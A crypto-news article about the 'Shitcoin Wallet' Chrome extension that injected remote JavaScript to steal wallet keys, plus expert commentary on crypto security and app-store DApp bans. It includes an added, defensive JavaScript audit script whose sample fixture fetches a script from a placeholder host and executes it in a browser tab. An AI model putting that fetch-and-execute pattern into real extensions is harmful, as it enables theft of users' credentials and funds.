The “Shitcoin Wallet” debacle shined a light on crypto security issues. Experts weigh in on how companies are caught in the balance.
The cryptocurrency sector attracts many criticisms. One is that it can appear impenetrable to newcomers. Another is that it is probably easier to lose money investing in crypto than in most other areas of finance. What’s more, these issues can combine to create a lucrative environment for hackers with nefarious intentions.
Chrome browser extension makes a stink
By virtue of the fluctuations and hype that influence the markets, investors are often highly motivated to buy certain cryptocurrencies. Regardless of their background, all face the same initial hurdles: Where to buy the cryptocurrency and where to store it?
Due in part to the lack of robust regulation and the limited legal ability of often underfunded and overstretched law enforcement, there is no uniform, risk-free way for the uninitiated to buy cryptocurrency.
Many scam wallets and exchanges have high-quality and well-designed websites that create a convincing illusion of authenticity. Although the mechanics of both cryptocurrencies and blockchain are highly complex, everyday investors are not expected to be technology experts.
While many investors might not be coder-extraordinaires, there are fortunately a number of experts who detect something odd online and have the know-how to dive into the code and see what’s truly going on. In only the last few days, the crypto world learned of the latest scam to part investors from their precious funds.
Caught with hands in the crypto jar
On Dec. 30, Harry Denley, a security officer at MyCrypto, spotted that an Ethereum wallet, known as “Shitcoin Wallet,” was reportedly injecting malicious JavaScript code into open browser windows to steal data from customers.
After examining the code, Denley noted that the Chrome extension functions by downloading JavaScript files from a remote server. Denley related to Cointelegraph how Shitcoin Wallet was brought to his attention and what exactly set off the alarm bells for him:
“Since we started calling out, indexing and investigating a bunch of different scams, malware and phishing kits, we have gained a network of people who consistently report to us. One of those people reported Shitcoin Wallet to me directly with a brief investigation of the behaviour of injecting `content_.js` into the current browser tab to steal secrets. Before the report to me, I had never heard of it. I then downloaded the extension on a VM and viewed the code to confirm the report and find other malicious behaviour — the wallet create behaviour of the extension also sent the fresh secrets to their backend.”
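The behaviour Denley describes, an extension that runs on every tab and pulls its script from a remote server, leaves traces a reviewer can look for in an unpacked extension before installing it. The following check is an added example, not code from the article, MyCrypto or the extension; the function name `auditExtension`, the patterns and the sample manifest and sources are assumptions constructed for illustration.

```javascript
// Added example: static triage of an unpacked Chrome extension (Manifest V2 era).
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Source patterns that suggest script code is pulled from a remote server at runtime.
const REMOTE_CODE_PATTERNS = [
  ['script element with remote src', /\.src\s*=\s*['"`]https?:\/\//],
  ['fetch of a remote .js file', /fetch\s*\(\s*['"`]https?:\/\/[^'"`]+\.js\b/],
  ['executeScript with a code string', /executeScript\s*\([^)]*\bcode\s*:/],
];

function auditExtension(manifest, sources) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of perms.filter((x) => BROAD_HOSTS.has(x))) {
    findings.push(`manifest: permission covers every site (${p})`);
  }
  for (const cs of manifest.content_scripts || []) {
    if ((cs.matches || []).some((m) => BROAD_HOSTS.has(m))) {
      findings.push(`manifest: content script on every page (${(cs.js || []).join(', ')})`);
    }
  }
  // MV2 stores the CSP as a string, MV3 as an object with extension_pages.
  const raw = manifest.content_security_policy;
  const csp = typeof raw === 'string' ? raw : (raw && raw.extension_pages) || '';
  if (/script-src[^;]*https?:\/\//.test(csp)) {
    findings.push('manifest: CSP allows scripts from a remote origin');
  }
  for (const [file, text] of Object.entries(sources)) {
    for (const [label, re] of REMOTE_CODE_PATTERNS) {
      if (re.test(text)) findings.push(`${file}: ${label}`);
    }
  }
  return findings;
}

// Constructed sample, not the real extension's files; example.invalid is a placeholder host.
const sampleManifest = {
  manifest_version: 2,
  permissions: ['tabs', 'storage', '<all_urls>'],
  content_security_policy: "script-src 'self' https://cdn.example.invalid; object-src 'self'",
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};
const sampleSources = {
  'background.js':
    "fetch('https://cdn.example.invalid/remote.js').then((r) => r.text())" +
    '.then((body) => chrome.tabs.executeScript(tabId, { code: body }));',
  'content.js': "document.title = 'wallet';",
};
console.log(auditExtension(sampleManifest, sampleSources).join('\n'));
```

A clean result from a pattern scan like this does not clear an extension; it only ranks which ones deserve the manual review in a VM that Denley describes.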
“Shitcoin” is a derogatory term that frequently pops up in Bitcoin (BTC) maximalist circles, as well as among investors who have a particular belief in the inherent qualities of one digital currency of their choice over all others.
While it’s true that the online world of crypto discussion has an oversupply of irony and trolling, which is often built into the branding of companies and platforms, many commentators felt that the provocatively named “Shitcoin Wallet” should have been a big enough warning for investors to steer clear. A number of Twitter users wrote of their disbelief that people would mistake the Chrome extension for a legitimate service.
Cybersecurity expert Kevin Beaumont appeared to tweet his incredulity at the idea that someone would voluntarily install a plugin called “Shitcoin Wallet” after receiving an email from his office’s security team:
“First email at work today, our threat intelligence provider having to write up malware in ‘Shitcoin wallet.’ Damn, I was just about to install Shitcoin Wallet plugin.”
Likewise, self-described open-source evangelist at Red Hat Jan Wildeboer also tweeted that the name should set off alarm bells for investors:
“Who would even install an extension with that name? #WhereIsMySurprisedFace A Google Chrome extension named Shitcoin Wallet is stealing passwords and wallet private keys.”
Experts weigh in on security deficit in crypto
Hartej Sawhney, CEO of Las Vegas-based cybersecurity agency Zokyo Labs, told Cointelegraph that getting crypto companies to have a robust cybersecurity policy in place is easier said than done due in part to an over-reliance on insurance policies and staffing restrictions:
“Crypto is a new industry that is relatively unregulated. The challenge of having a cybersecurity program is needing to have qualified staff both in-house and third-party. Basic standards such as hiring third party ethical hackers to regularly conduct penetration testing are not being followed. In Crypto, if hackers can identify and exploit protocol flaws, then they will compromise the entire network, since the security chain is protocol, then exchange, and then wallet.”
The lack of comprehensive regulatory structures and security standards in the crypto industry is decried from both inside and out. Sawhney explained to Cointelegraph that many companies do not even have staff assigned for general tech oversight and that the industry suffers from a lack of incentive for those qualified to fill the gap:
“Many major crypto companies do not even have an assigned Chief Information Security Officer or a basic cybersecurity program that highlights what steps to even take when facing a breach. There is also a lack of incentive for world-class cybersecurity specialists to focus on the crypto industry. An extremely specialized skill set is needed to focus on the intersection of cybersecurity and cryptocurrency.”
For Charles Phan, chief technology officer of the London-based exchange Interdax, a joint effort needs to be made by both law enforcement and crypto businesses in order to boost cybersecurity defences and awareness. Phan went on to add:
“Many aspects of cybercrime also require specific knowledge so there needs to be communication between experts, law enforcement, investors and the ecosystem in general to weed out bad players. Prevention in the form of education is also important.”
Aanand Krishnan, CEO and founder of Tala Security, said that understanding the reasoning for the rise in attacks is simple: Security is just not up to scratch. Krishnan told Cointelegraph:
“It may be stating the obvious, but attacks are on the rise because attack techniques continue to innovate while security effectiveness has waned. This ‘State of the market’ requires either more security investment or different thinking. Since security budgets remain tight, new approaches are required. Many of these attacks leverage JavaScript vulnerabilities that can be addressed by standards-based security measures. Surprisingly these measures are infrequently deployed.”
Is Google masking its intentions?
While the Shitcoin Wallet extension was rightly spotted and outed, not all online platforms get the treatment they feel they deserve. Since the watershed moment of Facebook’s Libra announcement in 2019, the world’s tech behemoths have begun scaling up their operations in the cryptocurrency industry. With the relatively short-lived “Libra effect” aside, the actions of influential and powerful companies do not always have a positive impact.
In a world where mobile phones play an ever more central role in daily life, the presence of an app on either Apple’s App Store or Google’s Play App Store can be a matter of life or death for companies. Apps that are found to fall foul of regulations are frequently removed from the stores. While platforms must exert prudence over what apps they make available for customers, security measures do not always go as planned.
In late December 2019, the prominent Chrome extension and wallet service provider MetaMask received an unwanted Christmas present in the form of a Google blacklisting. Fortunately for MetaMask, the ban only lasted a week before it was eventually overturned. Google’s reasoning for the ban stems from the tech giant mistaking the browser extension for a mining app, a category that is not permitted.
Although MetaMask may well have been temporarily canceled by Google, the short blacklisting unearthed other issues for the wallet provider. As reported in late December, a MetaMask contributor alleged that the team was totally overwhelmed and had not received adequate support from its parent firm, ConsenSys.
While popular crypto companies being stretched under the pressures of rapidly growing demand is far from uncommon, the contributor also alleged that the company was neither transparent nor decentralized, claiming that the project’s code was “of low quality, full of technical debt.”
The contributor’s comments elicited a response from Daniel Finlay, a MetaMask employee, who challenged what he described as the alarmist tone of someone who was not an official team member. Nonetheless, Finlay admitted that some of the criticisms were accurate, particularly those regarding the project’s code. Finlay told Cointelegraph that he felt uncomfortable about the mounting bans on crypto-related companies and accounts occurring across technology platforms:
“I very much hope that this was an honest mistake on the part of Google’s reviewers, but in combination with all the crypto YouTube bans, it definitely puts me at disease about how Google is engaging with decentralizing technologies.”
Braden Perry, a former federal enforcement attorney and a regulatory and government investigations attorney with Kansas City-based Kennyhertz Perry LLC, explained to Cointelegraph that while Google has considerable influence over the proliferation of DApps on its platforms, the lack of regulatory clarity and the clash between security and demand often mean that the tech giant finds itself in a tricky situation:
“They have altered course and allowed apps after further review. Take MetaMask as an example — Google disallowed it and then based on the reaction for the developers and public, reversed course and allows the app. Google is in a difficult position, trying to ensure safety to the public that downloads Dapps while staying relevant to the developers behind the Dapps.”
Apple is also wary of DApps
MetaMask was not the only company to draw the ire of one of the so-called Big Four of tech. According to a Reddit post published on Dec. 28, the United States-based cryptocurrency exchange and wallet provider Coinbase warned users that it might be forced to remove the DApp browser feature from its wallet application in order to comply with Apple’s mobile App Store policy.
Coinbase CEO Brian Armstrong commented on the post, outlining his view that Apple was undergoing a process of eliminating DApps from the App Store:
“This is really unfortunate to see. Apple seems to be eliminating usage of Dapps from the App Store. […] It’s beyond Coinbase and IMO a very big threat to the ecosystem.”
For Zokyo Labs’ Sawhney, the actions of many big tech companies are tantamount to censorship: “It’s all about censorship and control. Tech giants, such as Apple and Google, want their customers to have limited exposure to the multi-billion dollar DApp market.”
For MyCrypto’s Denley, the question of Google’s stance toward DApps is not quite so simple. While Denley recognizes that Google has made some questionable decisions regarding the execution of its policy, part of this is down to a lack of clarity:
“Google’s approach to DApp/cryptocurrency censorship is not consistent, so it’s not justified in my view as the rules are too muddy to know which side of the line you stand.”
Denley added that once there is greater clarity about what should and shouldn’t be allowed regarding the ability to censor and police poor quality or malicious cryptocurrency content, it will be easier for companies and commentators alike to pick sides. Braden Perry outlined his view to Cointelegraph that through regulation, it may be possible to strike a healthy balance between decentralization and security:
“Regulation is inevitable. How it will affect crypto depends on what that regulation looks like. A hasty attempt to rein in every potential for security would likely fail and cause more damage than good to the technology. But a well-designed regulatory scheme that aims to affect the bad actors and not overregulate the technology would likely be a positive for crypto, and this would require a collaborative effort between Congress, regulators, big tech (Google, Apple, etc) and developers.”
Taking a market-based approach, Tala Security’s Krishnan argued that decentralization had already been accepted. Krishnan’s comments also echoed the growing consensus among business leaders and legal figures in the cryptocurrency industry that the only way forward is the creation of standards-based security and information sharing in order to turn the tide against the proliferation of malicious actors in the industry:
“Standards-based security models where information-sharing, often from the best and brightest, offers hope for defining the required security model of the future. Embracing these models and contributing to their advancement is the kind of different thinking that’s required to ensure that the attackers don’t always win.”